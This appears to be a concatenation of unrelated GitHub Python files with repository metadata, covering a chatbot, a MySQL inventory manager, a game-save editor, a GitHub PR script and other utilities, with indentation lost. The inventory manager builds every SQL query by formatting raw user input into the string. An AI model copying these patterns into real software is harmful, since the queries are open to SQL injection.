module_name=self.module_name, fn_name=self.fn_name, python_file=self.python_file
)
)
def _asdict(self):
ddict = super(_ExecutionTargetHandleData, self)._asdict()
# Normalize to Posix paths
for key in ['repository_yaml', 'python_file']:
if ddict[key]:
ddict[key] = Path(ddict[key]).as_posix()
return ddict
| helloworld/continuous-dagster | deploy/dagster_modules/dagster/dagster/core/definitions/handle.py | handle.py | py | 28,007 | python | en | code | 2 | github-code | 36 |
26921499285 | import random
import json
import datetime
from flask import Flask, request, render_template
from flask_cors import CORS, cross_origin
from nltk.chat.util import Chat, reflections
app = Flask(__name__)
cors = CORS(app)
app.config["CORS_HEADERS"] = "Content-Type"
current_date = datetime.datetime.now().strftime("%A, %B %d, %Y")
current_time = datetime.datetime.now().strftime("%H:%M:%S")
pairs = [
["hi", ["Hello!", "Hi there!"]],
["what is your name?", ["My name is Chatbot."]],
["bye", ["Goodbye!", "Bye!"]],
["what is the current date?", [f"The current date is {current_date}."]],
["what is the current time?", [f"The current time is {current_time}."]],
]
with open("data.json", "r", encoding="utf-8") as f:
data = json.load(f)
user_inputs = []
def chatbot_response(user_input, confirm_message, new_data):
bot_response = ""
if user_input:
chatbot = Chat(pairs, reflections)
bot_response = chatbot.respond(user_input)
if not bot_response:
if user_input in data:
if isinstance(data[user_input], list):
bot_response = random.choice(data[user_input])
else:
bot_response = data[user_input]
else:
bot_response = "I'm sorry, I'm not sure. Please try asking a different question or providing more information."
if confirm_message:
if confirm_message.lower() == "yes":
if new_data:
data[user_input] = new_data
with open("data.json", "w", encoding="utf-8") as f:
json.dump(data, f, ensure_ascii=False)
bot_response = (
"Thank you! I've added that to my knowledge base."
)
else:
bot_response = "I'm sorry, I didn't receive any new data. Please try again."
else:
bot_response = "I'm sorry, I can't help with that."
else:
bot_response = "I'm not sure what you mean. Do you want to add this to my knowledge base?"
else:
save_user_input(user_input, bot_response)
return bot_response
def save_user_input(user_input, bot_response):
user_inputs.append(
{"user_input": user_input, "bot_response": bot_response})
with open("user_inputs.json", "w", encoding="utf-8") as f:
json.dump(user_inputs, f, ensure_ascii=False)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/chat", methods=["POST"])
@cross_origin()
def chat():
user_input = request.form.get("user_input")
confirm_message = request.form.get("confirm_message")
new_data = request.form.get("new_data")
bot_response = ""
if user_input:
bot_response = chatbot_response(user_input, confirm_message, new_data)
response = {"bot_response": bot_response}
else:
response = {
"bot_response": "I'm sorry, I did not receive any input. Please try again."
}
return response
if __name__ == "__main__":
app.run(debug=True, port=8080)
| sinde530/python | pino-chatbot/flask_test.py | flask_test.py | py | 3,170 | python | en | code | 0 | github-code | 36 |
39753649325 | import pandas as pd
import numpy as np
from datetime import date, datetime
import pickle
import warnings
warnings.filterwarnings("ignore")
def holiday(col):
# Creamos una lista con los días festivos
lista_holiday = ["01-01-2018", "16-01-2018", "20-02-2018", "31-03-2018",
"29-05-2018", "04-07-2018", "05-07-2018", "28-07-2018",
"04-09-2018", "10-11-2018", "23-11-2018", "24-11-2018",
"24-12-2018", "25-12-2018", "31-12-2018", "01-01-2019",
"16-01-2019", "20-02-2019", "31-03-2019", "29-05-2019",
"04-07-2019", "05-07-2019", "28-07-2019", "04-09-2019",
"10-11-2019", "28-11-2019", "29-11-2019", "24-12-2019",
"25-12-2019", "31-12-2019"]
if col in lista_holiday:
hol = 1
else:
hol = 0
return hol
# Como las estaciones no coinciden con la fecha, creamos una función para ponerlo bien
def season_of_date(col):
year= col.year
seasons = {'spring': pd.date_range(start= '21-03-' + str(year), end= '20-06-' + str(year) ),
'summer': pd.date_range(start= '21-06-' + str(year), end= '22-09-' + str(year) ),
'autumn': pd.date_range(start= '23-09-' + str(year), end= '20-12-' + str(year))}
if col in seasons['spring']:
return 'spring'
if col in seasons['summer']:
return 'summer'
if col in seasons['autumn']:
return 'autumn'
else:
return 'winter'
def workingday(col1, col2):
# Le pasamos las columnas holiday y weekday
if col1 == 1 or col2 == 6 or col2 == 7:
# Si holiday es 1 (vacaciones) y weekday es 6 o 7 (sábado o domingo) --> 0
return 0
else:
# Para los demás días --> 1
return 1
def usuario(fe,cli, dataf):
meses = {"01":"enero", "02":"febrero", "03":"marzo",
"04":"abril", "05": "mayo","06":"junio",
"07": "julio", "08": "agosto", "09": "septiembre",
"10": "octubre", "11": "noviembre", "12": "diciembre"}
dict_clima = {"1": "despejado", "2": "nublado", "3": "tormenta", "4":"horrible"}
dteday = "-".join(fe)+"-2019"
for k,v in dict_clima.items():
if v in cli:
clima = cli.replace(v,k)
for k,v in meses.items():
if v in dteday:
dteday = dteday.replace(v,k)
dict_usuario = {"dteday" : dteday,"season": 0 , "yr": 1, "mnth":0 ,
"holiday": 0, "weekday": 0 ,"workingday":0, "weathersit": int(clima),
"atemp": 0, "hum": 0, "windspeed": 0 }
df_usuario = pd.DataFrame(dict_usuario, index = [0])
# Creamos una lista con los días festivos
lista_holiday = ["01-01-2018", "16-01-2018", "20-02-2018", "31-03-2018",
"29-05-2018", "04-07-2018", "05-07-2018", "28-07-2018",
"04-09-2018", "10-11-2018", "23-11-2018", "24-11-2018",
"24-12-2018", "25-12-2018", "31-12-2018", "01-01-2019",
"16-01-2019", "20-02-2019", "31-03-2019", "29-05-2019",
"04-07-2019", "05-07-2019", "28-07-2019", "04-09-2019",
"10-11-2019", "28-11-2019", "29-11-2019", "24-12-2019",
"25-12-2019", "31-12-2019"]
df_usuario["holiday"] = df_usuario["dteday"].apply(holiday)
# Cambiamos la columna dteday a datetime
df_usuario.dteday = pd.to_datetime(df_usuario.dteday)
# Pasamos la funcion
df_usuario["season"] = df_usuario["dteday"].apply(season_of_date)
df_usuario["weekday"] = df_usuario["dteday"].dt.dayofweek
# Le sumamos uno para que vayan del 1 al 7, de lunes a domingo
df_usuario["weekday"] = df_usuario["weekday"] + 1
df_usuario["mnth"] = df_usuario["dteday"].dt.month
df_usuario["workingday"] = df_usuario.apply(lambda col: workingday(col["holiday"], col["weekday"]), axis = 1)
season = df_usuario["season"][0]
weathersit = df_usuario["weathersit"][0]
month = df_usuario["mnth"][0]
holiday_yn = df_usuario["holiday"][0]
humedad = dataf[(dataf["season"] == season) & (dataf["weathersit"] == weathersit) & (dataf["mnth"] == month) &(dataf["holiday"] == holiday_yn)]["hum"].mean()
sensacion = dataf[(dataf["season"] == season) & (dataf["weathersit"] == weathersit) & (dataf["mnth"] == month) &(dataf["holiday"] == holiday_yn)]["atemp"].mean()
viento = dataf[(dataf["season"] == season) & (dataf["weathersit"] == weathersit) & (dataf["mnth"] == month) &(dataf["holiday"] == holiday_yn)]["windspeed"].mean()
df_usuario[["atemp", "hum", "windspeed"]] = sensacion, humedad, viento
df_usuario.drop("dteday", axis=1, inplace= True)
return df_usuario
def encoding(dataf):
map_holiday = {0:7, 1:0}
dataf["holiday"] = dataf["holiday"].map(map_holiday)
map_weathersit = {3:0, 2:2, 1:4}
dataf["weathersit"] = dataf["weathersit"].map(map_weathersit)
map_season = {"winter":0, "autumn":1, "spring":1, "summer":2}
dataf["season"] = dataf["season"].map(map_season)
mapa_weekday = {1: 0, 2:1, 3: 1, 4: 2, 5: 2, 6:2, 7:1}
dataf["weekday"] = dataf["weekday"].map(mapa_weekday)
mapa_mnth = {1: 0, 2:0, 3: 1, 4: 1, 5: 2, 6:2, 7:2, 8:2, 9:2, 10:2, 11:1, 12:1}
dataf["mnth"] = dataf["mnth"].map(mapa_mnth)
map_workingday = {0:1, 1:2}
dataf["workingday"] = dataf["workingday"].map(map_workingday)
map_yr = {0:1, 1:2}
dataf["yr"] = dataf["yr"].map(map_yr)
return dataf | sanfermen/Modelo-Regresion-Alquiler-Bicicletas | prediccion/support.py | support.py | py | 5,489 | python | en | code | 0 | github-code | 36 |
11580020473 | import mysql.connector
from tabulate import tabulate
import getpass
def login():
# This function is for establishing connection
# between python and mysql database by taking
# input of user id and password and host name
# then it take the input of database from the
# user and if the database exits it will select
# it for further queries else it will create one
# and use it.
try:
global app_cursor
global connection
connection = mysql.connector.connect(user=input('Username: '),
password=input('Password: '), host=input('Host: '))
app_cursor = connection.cursor(buffered=True)
app_cursor.execute("show databases")
app_database = input('Database: ')
database_selected = False
for i in app_cursor.fetchall():
for j in i:
if app_database == j:
app_cursor.execute("use %s" % app_database)
print('\n', app_database, " is now the selected database.", '\n')
database_selected = True
break
if database_selected is False:
app_cursor.execute("create database %s" % app_database)
app_cursor.execute("use %s" % app_database)
print('\n', app_database, " is now the selected database.", '\n')
table_menu()
except mysql.connector.errors.ProgrammingError:
print("\nEnter valid Username and Password!!\n")
login()
except mysql.connector.errors.InterfaceError:
print("\nEnter valid Host name.\n")
login()
except mysql.connector.errors.DatabaseError:
print("\nSomething went wrong try again.\n")
login()
def table_menu():
# This function gives the user the menu for operation
# this is the main menu there is another menu for performing
# operations on the table and it will be triggered on users demand.
print('''To perform given functions enter the numerical value\nassigned to the function:-\n
1 => Create Table.
2 => Perform Operations on Table.
3 => To check Stock Tables in the selected Database.
4 => Delete table.
5 => Logout and exit.
Note:- To terminate any operation you selected by
mistake enter '?' symbol it will take you back
to the menu.
''')
try:
def table_menu_functions(a):
if a == 1:
# This set of code will be executed when user wants to create table.
# By taking a string input for table name.
# If the table of given name already exists in the selected database,
# the function will be again called with parameter 1
name = str(input("Enter table Name: "))
if name == '?':
table_menu()
else:
try:
app_cursor.execute('''Create table %s(
Id varchar (255) not null primary key,
Name varchar(255) not null,
Category varchar(255) not null,
Price int,
Stock int)''' % name)
print("Table Created successfully.\n")
connection.commit()
table_menu()
except mysql.connector.errors.ProgrammingError:
print("Table of this name already exists")
table_menu_functions(1)
elif a == 4:
# This set of code if for choice 4 that is for is for deleting table from selected database.
# By taking a string input and further asking for confirmation for deleting the table.
# If table not exists in the database then the exception is handled in except block.
name = str(input("Enter table Name: "))
try:
if name == '?':
table_menu()
else:
confirmation = str(input("Are you sure you want to delete the above table (y/n): "))
confirmation.lower()
if confirmation == 'y':
app_cursor.execute("Drop table %s" % name)
print("Table %s is deleted permanently.\n" % name)
connection.commit()
table_menu()
elif confirmation == 'n':
print("Table %s is not deleted\n." % name)
table_menu()
except mysql.connector.errors.ProgrammingError:
print("Table of this name do not exist\n.")
table_menu()
elif a == 5:
# This set of code is choice 5 that is Save and exit application.
# Its saves all the query processed and closes the connection and cursor.
# After that it leave a vague input statement to prevent to sudden close of console window.
import sys
connection.commit()
app_cursor.close()
connection.close()
input("Press any key to exit..")
sys.exit()
elif a == 3:
# This set of code is choice 3 that is to print the list of stock tables in the selected database.
# It print the list in a Table format with the help of Tabulate function of Tabulate module.
app_cursor.execute("Show tables")
data = app_cursor.fetchall()
tables = []
for i in data:
tables.append(i)
print("\n", tabulate(tables, headers=['Names'], tablefmt='psql'), "\n")
table_menu()
elif a == 2:
# This set of code is for performing operations on the table.
# By taking input of the table name on which user wants to perform functions.
# It checks whether the given table name exists in the database or not.
# If exists it triggers the function function_menu(args: Table name).
# If not exists it will ask again for input.
name = str(input("Enter table Name: "))
if name == '?':
table_menu()
else:
app_cursor.execute("show tables")
existance = False
for i in app_cursor:
for j in i:
if j == name:
existance = True
break
else:
continue
if existance is True:
function_menu(name)
else:
print("\nEnter valid table name. This table does not exist in the current database.\n")
choice = int(input("To go back to main menu enter 1 and To re-enter the table name enter 2."
"(1/2)"))
if choice == 1:
table_menu()
elif choice == 2:
table_menu_functions(2)
else:
print("Invalid input directing back to main menu.")
table_menu()
else:
# If users enter anything other than listed in menu then this code will be executed.
# It again asks for the input from the user.
print("Enter Number from The menu only.")
choice = int(input("Your Choice: "))
table_menu_functions(choice)
table_menu_choice = int(input("Your Choice: "))
table_menu_functions(table_menu_choice)
except ValueError:
# If user enter anything other than integer.
print("Enter valid input.")
table_menu()
def function_menu(name):
#This function is for editing table
# For tasks like Adding item to table, deleting item from table and updating item stock
global headers
headers = ['Id', 'Name', 'Category', 'Price', 'Stock']
name = name
print('''To perform given functions enter the numerical value\nassigned to the function:-\n
1 => To print The Stock Table.
2 => To add a product to stock table.
3 => To delete a product from the stock table.
4 => To Perform operations on a product.
5 => To export data of table to excel file.
6 => To go back to previous menu.
Note:- To terminate any operation you selected by
mistake enter '?' symbol it will take you back
to the menu.''')
try:
choice = int(input("Your choice: "))
if choice == 1:
app_cursor.execute("Select * from %s" % name)
data = []
for i in app_cursor:
data.append(i)
print(tabulate(data, headers=headers, tablefmt='psql'))
function_menu(name)
if choice == 2:
while True:
try:
p_id = input("Enter the Product ID: ")
if p_id == '?':
table_menu()
break
else:
break
except ValueError:
print("Enter valid input.")
while True:
try:
p_name = input("Enter the Product Name: ")
if p_name == '?':
table_menu()
else:
break
except ValueError:
print("Enter valid input.")
while True:
try:
p_category = input("Enter the Product Category: ")
if p_category == '?':
table_menu()
else:
break
except ValueError:
print("Enter valid input.")
while True:
try:
p_price = int(input("Enter the Product Price: "))
break
except ValueError:
print("Enter valid input.")
while True:
try:
p_quantity = int(input("Enter the Product stock: "))
break
except ValueError:
print("Enter valid input.")
app_cursor.execute("insert into %s values('%s','%s','%s',%d,%d)"
% (name, p_id, p_name, p_category, p_price, p_quantity))
connection.commit()
function_menu(name)
elif choice == 3:
p_id = input("Enter the Product ID of the product you want to delete: ")
app_cursor.execute("select * from %s where Id='%s'" % (name, p_id))
data = []
for i in app_cursor:
data.append(i)
print(tabulate(data, headers=headers, tablefmt='psql'))
while True:
conf = input("Are you sure you want to this product (y/n): ")
if conf == 'y':
app_cursor.execute("delete from %s where Id='%s'" % (name, p_id))
connection.commit()
break
elif conf == 'n':
function_menu(name)
break
else:
print("Enter valid input.")
function_menu(name)
elif choice == 6:
table_menu()
elif choice == 4:
product_update(name)
elif choice == 5:
import xlsxwriter
q = 0
while q < 1:
try:
filename = input("Enter file name: ")
print("File will be saved on the desktop")
workbook = xlsxwriter.Workbook("D:\\%s.xlsx" % filename)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, "ID")
worksheet.write(0, 1, "NAME")
worksheet.write(0, 2, "CATEGORY")
worksheet.write(0, 3, "PRICE")
worksheet.write(0, 4, "STOCK")
app_cursor.execute("SELECT * FROM %s" % name)
data = app_cursor.fetchall()
row = 1
coloumn = 0
for (a, b, c, d, e) in data:
worksheet.write(row, coloumn, a)
worksheet.write(row, coloumn + 1, b)
worksheet.write(row, coloumn + 2, c)
worksheet.write(row, coloumn + 3, d)
worksheet.write(row, coloumn + 4, e)
row = row + 1
workbook.close()
print("Data exported successfully to %s at D drive" % filename)
break
except:
print("A file of this name already exists use a different name")
function_menu(name)
except ValueError:
print("Enter valid input.")
function_menu(name)
def product_update(name):
name = name
print('''To perform given functions enter the numerical value\nassigned to the function:-\n
1 => To update stock of product.
2 => To update name of product.
3 => To update price of product.
4 => To change category of product.
5 => To go back to previous menu.
Note:- To terminate any operation you selected by
mistake enter '?' symbol it will take you back
to the menu.''')
try:
choice = int(input("Your choice: "))
if choice == 2:
name_p = str(input("Enter the name of the product: "))
if name_p == '?':
product_update(name)
else:
app_cursor.execute("select * from %s where Name='%s'" % (name, name_p))
data = []
for i in app_cursor:
data.append(i)
print(tabulate(data, headers=headers, tablefmt='psql'))
id_p = str(input("Enter the product id of product you want to change name: "))
name_new = str(input("Enter the new name of the product: "))
if name_new == '?' or id_p == '?':
product_update(name)
connection.commit()
else:
app_cursor.execute("update %s set Name='%s' where Id='%s'" % (name, name_new, id_p))
print("Product name updated successfully.")
product_update(name)
elif choice == 1:
name_p = str(input("Enter the name of the product: "))
if name_p == '?':
product_update(name)
else:
app_cursor.execute("select * from %s where Name='%s'" % (name, name_p))
data = []
for i in app_cursor:
data.append(i)
print(tabulate(data, headers=headers, tablefmt='psql'))
id_p = str(input("Enter the product id of product you want to change stock: "))
stock_new = int(input("New stock of the product: "))
if id_p == '?':
product_update(name)
else:
app_cursor.execute("update %s set Stock=%d where Id='%s'" % (name, stock_new, id_p))
print("Product Stock updated successfully.")
connection.commit()
product_update(name)
elif choice == 5:
function_menu(name)
elif choice == 3:
name_p = str(input("Enter the name of the product: "))
if name_p == '?':
product_update(name)
else:
app_cursor.execute("select * from %s where Name='%s'" % (name, name_p))
data = []
for i in app_cursor:
data.append(i)
print(tabulate(data, headers=headers, tablefmt='psql'))
id_p = str(input("Enter the product id of product you want to change price: "))
price_new = int(input("New price of the product: "))
if id_p == '?':
product_update(name)
else:
app_cursor.execute("update %s set Price=%d where Id='%s'" % (name, price_new, id_p))
print("Product Price updated successfully.")
connection.commit()
product_update(name)
elif choice == 4:
name_p = str(input("Enter the name of the product: "))
if name_p == '?':
product_update(name)
else:
app_cursor.execute("select * from %s where Name='%s'" % (name, name_p))
data = []
for i in app_cursor:
data.append(i)
print(tabulate(data, headers=headers, tablefmt='psql'))
id_p = str(input("Enter the product id of product you want to change category: "))
category_new = str(input("New Category of the product: "))
if id_p == '?':
product_update(name)
else:
app_cursor.execute("update %s set Category='%s' where Id='%s'" % (name, category_new, id_p))
print("Product Category updated successfully.")
connection.commit()
product_update(name)
except ValueError:
print("Enter valid input.")
product_update(name)
login()
| manavmittal05/InventoryManagement | ManavMittal_2021538_Master Stock-1.py | ManavMittal_2021538_Master Stock-1.py | py | 18,424 | python | en | code | 0 | github-code | 36 |
17106921371 | import os
from dataclasses import dataclass, field
from typing import List
with open(os.path.join(os.path.dirname(__file__), "input"), "r") as inputFile:
inputLines = [line.strip() for line in inputFile.readlines() if line]
@dataclass
class Signal:
cycle: int
register: int
strength = 0
def __post_init__(self):
self.strength = self.cycle * self.register
@dataclass
class CRT:
pixels: List[str] = field(default_factory=lambda: [""])
def drawPixel(self, register: int) -> None:
self.pixels[-1] += "#" if abs(len(self.pixels[-1]) - register) <= 1 else "."
if len(self.pixels[-1]) == 40:
self.pixels.append("")
def __str__(self) -> str:
return "\n".join(self.pixels)
class CPU:
def __init__(self) -> None:
self.states: List[Signal] = [Signal(cycle=0, register=1)]
self.instructions: List[str] = []
self.interestingSignals: List[Signal] = []
self.crt = CRT()
def parseLine(self, line) -> None:
"""Transform line into instructions"""
if line == "noop":
return self.instructions.append("noop")
self.instructions.append("start " + line)
self.instructions.append("end " + line)
def executeInstructions(self) -> None:
for cycle, line in enumerate(self.instructions, start=1):
register = self.states[-1].register
self.crt.drawPixel(register)
# Read is **during** the cycle, not after the cycle
if cycle % 40 == 20:
self.interestingSignals.append(Signal(register=register, cycle=cycle))
if line.startswith("end "):
register += int(line.split(" ")[-1])
self.states.append(Signal(register=register, cycle=cycle))
def sumInterestingSignals(self) -> int:
return sum([signal.strength for signal in self.interestingSignals])
def answer(iterable):
cpu = CPU()
[cpu.parseLine(line) for line in iterable]
cpu.executeInstructions()
# Answer 1
print(cpu.sumInterestingSignals())
# Answer 2
print(cpu.crt)
answer(inputLines)
| mmmaxou/advent-of-code | 2022/day-10/answer.py | answer.py | py | 2,140 | python | en | code | 0 | github-code | 36 |
33516010146 | # -*- coding: utf-8 -*-
from collective.es.index.interfaces import IElasticSearchClient
from elasticsearch import Elasticsearch
from zope.component import provideUtility
from zope.interface import directlyProvides
class ElasticSearchIngressConfFactory(object):
def __init__(self, section):
self.section = section
def _client_dict(self, value):
if not value:
value = [('127.0.0.1', '9200')]
return [dict(zip(['host', 'port'], el)) for el in value]
def prepare(self, *args, **kwargs):
self.query = self._client_dict(self.section.query)
self.ingest = self._client_dict(self.section.ingest)
self.ssl = self.section.ssl
self.verify_certs = self.section.verify_certs
self.ca_certs = self.section.ca_certs
self.client_cert = self.section.client_cert
self.client_key = self.section.client_key
def create(self):
base_client = Elasticsearch(
self.query,
use_ssl=self.ssl,
# here some more params need to be configured.
)
ingest_client = Elasticsearch(
self.ingest,
use_ssl=self.ssl,
# here some more params need to be configured.
)
base_client.ingest = ingest_client
directlyProvides(base_client, IElasticSearchClient)
provideUtility(base_client)
| collective/collective.es.index | src/collective/es/index/components.py | components.py | py | 1,379 | python | en | code | 0 | github-code | 36 |
31064293035 |
from ..utils import Object
class Photo(Object):
"""
Describes a photo
Attributes:
ID (:obj:`str`): ``Photo``
Args:
has_stickers (:obj:`bool`):
True, if stickers were added to the photoThe list of corresponding sticker sets can be received using getAttachedStickerSets
minithumbnail (:class:`telegram.api.types.minithumbnail`):
Photo minithumbnail; may be null
sizes (List of :class:`telegram.api.types.photoSize`):
Available variants of the photo, in different sizes
Returns:
Photo
Raises:
:class:`telegram.Error`
"""
ID = "photo"
def __init__(self, has_stickers, minithumbnail, sizes, **kwargs):
self.has_stickers = has_stickers # bool
self.minithumbnail = minithumbnail # Minithumbnail
self.sizes = sizes # list of photoSize
@staticmethod
def read(q: dict, *args) -> "Photo":
has_stickers = q.get('has_stickers')
minithumbnail = Object.read(q.get('minithumbnail'))
sizes = [Object.read(i) for i in q.get('sizes', [])]
return Photo(has_stickers, minithumbnail, sizes)
| iTeam-co/pytglib | pytglib/api/types/photo.py | photo.py | py | 1,177 | python | en | code | 20 | github-code | 36 |
17971188881 | from pyrainbird.resources import RAIBIRD_COMMANDS
def decode(data):
if data[:2] in RAIBIRD_COMMANDS["ControllerResponses"]:
cmd_template = RAIBIRD_COMMANDS["ControllerResponses"][data[:2]]
result = {"type": cmd_template["type"]}
for k, v in cmd_template.items():
if isinstance(v, dict) and "position" in v and "length" in v:
position_ = v["position"]
length_ = v["length"]
result[k] = int(data[position_: position_ + length_], 16)
return result
else:
return {"data": data}
def encode(command, *args):
request_command = "%sRequest" % command
command_set = RAIBIRD_COMMANDS["ControllerCommands"][request_command]
if request_command in RAIBIRD_COMMANDS["ControllerCommands"]:
cmd_code = command_set["command"]
else:
raise Exception(
"Command %s not available. Existing commands: %s"
% (request_command, RAIBIRD_COMMANDS["ControllerCommands"])
)
if len(args) > command_set["length"] - 1:
raise Exception(
"Too much parameters. %d expected:\n%s"
% (command_set["length"] - 1, command_set)
)
params = (cmd_code,) + tuple(map(lambda x: int(x), args))
arg_placeholders = (("%%0%dX" % ((command_set["length"] - len(args)) * 2))
if len(args) > 0
else "") + ("%02X" * (len(args) - 1))
return ("%s" + arg_placeholders) % (params)
| shun84/jeedom-plugin-rainbird | resources/pyrainbird/rainbird.py | rainbird.py | py | 1,498 | python | en | code | 0 | github-code | 36 |
41643896349 | from _GLOBAL_OPTIONS_ import factionsOptionMenu, addPremiumItems, addRevive, AddNightmareTickets, removeAds, unlockProfiles
from _PROFILE_OPTIONS_ import addItemsMenu, changeUsername, addCash, setFreeSkillReset, setLevel, setBlackStronboxes, addBlackKeys, addAugmentCores, setSupportItems, addMultiplayerStats
from _UTILS_ import mainTitle
from _EDIT_MANUALLY_ import profileManualEdit
from _SET_PROFILE_PATH_ import setProfilePath
from _FIX_INVENTORY_CRASH_ import fixInventory
from os import _exit, path
from win32console import SetConsoleTitle
from string import ascii_letters
from time import sleep
from json import dump, load
from msvcrt import getch, kbhit
from sys import stdout
mainMenuSelection = ['Global', 'Profile', 'Edit manually', 'Settings', 'About', 'Exit']
configMenuSelection = ['Set Profile', 'Set Profile Path Folder', 'Back up Profile.save [WORK IN PROGRESS]', 'Fix Inventory', 'Back']
globalMenuSelection = ['Factions', 'Premium Items', 'Revive Tokens', 'Premium Nightmare Tickets', 'Remove ads (ADS ON MOBILE)', 'Unlock profile (5-6)', 'Back']
profileMenuSelection = ['Add items', 'Change username', 'Add SAS Cash', 'Set free skill reset', 'Set level', 'Add black Strongboxes', 'Add random Strongboxes [PLACE HOLDER (THIS FEATURE IS WORK IN PROGRESS)]', 'Add black keys', 'Add augment cores', 'Add support items', 'Set stats', 'Back']
def about():
mainTitle()
print('''
Developed by: <\\>#0077 | 0daxelagnia
Special thanks to: BlapertureMesa ( cso-idn-player ) and hemisemidemipresent
Official Github repository: https://github.com/0daxelagnia/SAS4Tool/
Latest version: 2.0.0
Made with <3 for the SAS 4 cheats community!
(Press any key to go back)''')
sleep(0.25)
while True:
if kbhit():
return mainMenu()
def globalMenu():
SetConsoleTitle('SAS4Tool - Global Menu')
mainTitle()
for i in range(len(globalMenuSelection)):
print(f'[{ascii_letters[26+i]}] - {globalMenuSelection[i]}')
sleep(0.25)
while True:
if kbhit():
key = getch()
if key == b'a':
factionsOptionMenu()
return mainMenu()
if key == b'b':
addPremiumItems()
return mainMenu()
if key == b'c':
addRevive()
return mainMenu()
if key == b'd':
AddNightmareTickets()
return mainMenu()
if key == b'e':
removeAds()
return mainMenu()
if key == b'f':
unlockProfiles()
return mainMenu()
if key == b'g':
return mainMenu()
def profileMenu():
SetConsoleTitle('SAS4Tool - Profile Menu')
mainTitle()
for i in range(len(profileMenuSelection)):
print(f'[{ascii_letters[26+i]}] - {profileMenuSelection[i]}')
sleep(0.25)
while True:
if kbhit():
key = getch()
if key == b'a':
addItemsMenu()
return mainMenu()
if key == b'b':
changeUsername()
return mainMenu()
if key == b'c':
addCash()
return mainMenu()
if key == b'd':
setFreeSkillReset()
return mainMenu()
if key == b'e':
setLevel()
return mainMenu()
if key == b'f':
setBlackStronboxes()
return mainMenu()
if key == b'g':
pass
if key == b'h':
addBlackKeys()
return mainMenu()
if key == b'i':
addAugmentCores()
return mainMenu()
if key == b'j':
setSupportItems()
return mainMenu()
if key == b'k':
addMultiplayerStats()
return mainMenu()
if key == b'l':
return mainMenu()
def setProfileConfig(consoleProfileList):
SetConsoleTitle('SAS4Tool - Set profile')
mainTitle()
print('Select a profile:\n')
for i in range(len(consoleProfileList)):
print(f'[{ascii_letters[26+i]}] - {consoleProfileList[i]}')
sleep(0.25)
with open('config.json', 'r+') as f:
data = load(f)
f.seek(0)
f.truncate()
while True:
if kbhit():
key = getch()
if key == b'a':
data['consoleDefaultProfile'] = 'Profile 1'
data['defaultProfile'] = 'Profile0'
dump(data, f)
break
if key == b'b':
data['consoleDefaultProfile'] = 'Profile 2'
data['defaultProfile'] = 'Profile1'
dump(data, f)
break
if key == b'c':
data['consoleDefaultProfile'] = 'Profile 3'
data['defaultProfile'] = 'Profile2'
dump(data, f)
break
if key == b'd':
data['consoleDefaultProfile'] = 'Profile 4'
data['defaultProfile'] = 'Profile3'
dump(data, f)
break
if key == b'e':
data['consoleDefaultProfile'] = 'Profile 5'
data['defaultProfile'] = 'Profile4'
dump(data, f)
break
if key == b'f':
data['consoleDefaultProfile'] = 'Profile 6'
data['defaultProfile'] = 'Profile5'
dump(data, f)
break
def configMenu():
consoleProfileList = ['Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5', 'Profile 6']
SetConsoleTitle('SAS4Tool - Config Menu')
mainTitle()
for i in range(len(configMenuSelection)):
print(f'[{ascii_letters[26+i]}] - {configMenuSelection[i]}')
sleep(0.25)
while True:
if kbhit():
key = getch()
if key == b'a':
setProfileConfig(consoleProfileList)
return mainMenu()
if key == b'b':
setProfilePath()
return mainMenu()
if key == b'c':
return mainMenu()
if key == b'd':
fixInventory()
return mainMenu()
if key == b'e':
return mainMenu()
def mainMenu():
SetConsoleTitle('SAS4Tool - Main Menu')
mainTitle()
for i in range(len(mainMenuSelection)):
print(f'[{ascii_letters[26+i]}] - {mainMenuSelection[i]}')
sleep(0.25)
while True:
if kbhit():
key = getch()
if key == b'a':
return globalMenu()
if key == b'b':
return profileMenu()
if key == b'c':
profileManualEdit()
return mainMenu()
if key == b'd':
configMenu()
return mainMenu()
if key == b'e':
about()
return mainMenu()
if key == b'f':
try:
stdout.flush()
exit()
except:
stdout.flush()
_exit(0)
if __name__ == '__main__':
contents = {'version': '2.0.0', 'developer': '<\\>#0077', 'defaultProfile': 'Profile0', 'consoleDefaultProfile': 'Profile 1', "profileSavePath": ""}
if not path.exists('config.json'):
with open('config.json', 'w') as f:
f.seek(0)
f.truncate()
f = dump(contents, f, indent=4)
if path.exists('config.json'):
if path.getsize('config.json') == 0:
with open('config.json', 'w') as f:
f.seek(0)
f.truncate()
f = dump(contents, f, indent=4)
mainMenu() | SWFplayer/SAS4Tool | _MAIN_.py | _MAIN_.py | py | 8,232 | python | en | code | 0 | github-code | 36 |
31063179375 |
from ..utils import Object
class GroupCallParticipantVideoInfo(Object):
"""
Contains information about a group call participant's video channel
Attributes:
ID (:obj:`str`): ``GroupCallParticipantVideoInfo``
Args:
source_groups (List of :class:`telegram.api.types.groupCallVideoSourceGroup`):
List of synchronization source groups of the video
endpoint_id (:obj:`str`):
Video channel endpoint identifier
is_paused (:obj:`bool`):
True if the video is pausedThis flag needs to be ignored, if new video frames are received
Returns:
GroupCallParticipantVideoInfo
Raises:
:class:`telegram.Error`
"""
ID = "groupCallParticipantVideoInfo"
def __init__(self, source_groups, endpoint_id, is_paused, **kwargs):
self.source_groups = source_groups # list of groupCallVideoSourceGroup
self.endpoint_id = endpoint_id # str
self.is_paused = is_paused # bool
@staticmethod
def read(q: dict, *args) -> "GroupCallParticipantVideoInfo":
source_groups = [Object.read(i) for i in q.get('source_groups', [])]
endpoint_id = q.get('endpoint_id')
is_paused = q.get('is_paused')
return GroupCallParticipantVideoInfo(source_groups, endpoint_id, is_paused)
| iTeam-co/pytglib | pytglib/api/types/group_call_participant_video_info.py | group_call_participant_video_info.py | py | 1,336 | python | en | code | 20 | github-code | 36 |
40917483210 | import requests
import json
import sys
import os
class PR():
def __init__(self, token, user, repo) -> None:
self.token = token
self.user = user
self.repo = repo
def raise_pr(self, title, head, base):
url = "https://api.github.com/repos/"+ self.user +"/"+ self.repo+"/pulls"
payload = json.dumps({
"title": title,
"head": head,
"base": base
})
headers = {
'Authorization': 'Bearer ' + self.token,
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
if response.status_code == 201:
data = response.json()
return data["number"]
print(response.json())
return -1
def request_review(self, pr_number, reviewers):
print("Requesting for reviewers for PR {0}".format(pr_number))
url = "https://api.github.com/repos/" + self.user + "/" + self.repo + "/pulls/" + str(pr_number) + "/requested_reviewers"
print(url)
payload = {
"reviewers": reviewers
}
print(payload)
